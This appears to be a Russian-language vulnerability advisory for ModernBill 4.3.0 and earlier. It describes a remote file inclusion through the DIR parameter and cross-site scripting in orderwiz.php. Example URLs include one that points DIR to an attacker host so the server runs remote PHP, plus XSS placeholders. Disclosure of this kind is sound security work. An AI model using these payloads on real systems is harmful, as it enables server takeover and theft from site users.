Программа: ModernBill 4.3.0 и более ранние версии

Уязвимость позволяет удаленному
пользователю выполнить произвольные
команды на целевой системе и произвести XSS
нападение.

1. Уязвимость существует из-за
недостаточной фильтрации входных данных в
параметре DIR сценария 'include/functions.inc.php'.
Удаленный пользователь может с помощью
специально сформированного URL выполнить
произвольный PHP сценарий на целевой системе
с привилегия web сервера.

Пример:

http://[target]/samples/news.php?DIR=http://[attacker]/

2. Уязвимость существует из-за
недостаточной фильтрации входных данных в
параметрах 'aid' и 'c_code' сценария 'orderwiz.php'.
Удаленный пользователь может с помощью
специально сформированного URL выполнить
произвольный HTML сценарий в браузере жертвы
в контексте безопасности уязвимого сайта.

Пример:

http://[target]/order/orderwiz.php?v=1&aid=&c_code=[XSS]

http://[target]/order/orderwiz.php?v=1&aid=[XSS]

Подписаться
Уведомить о
0 комментариев
Межтекстовые Отзывы
Посмотреть все комментарии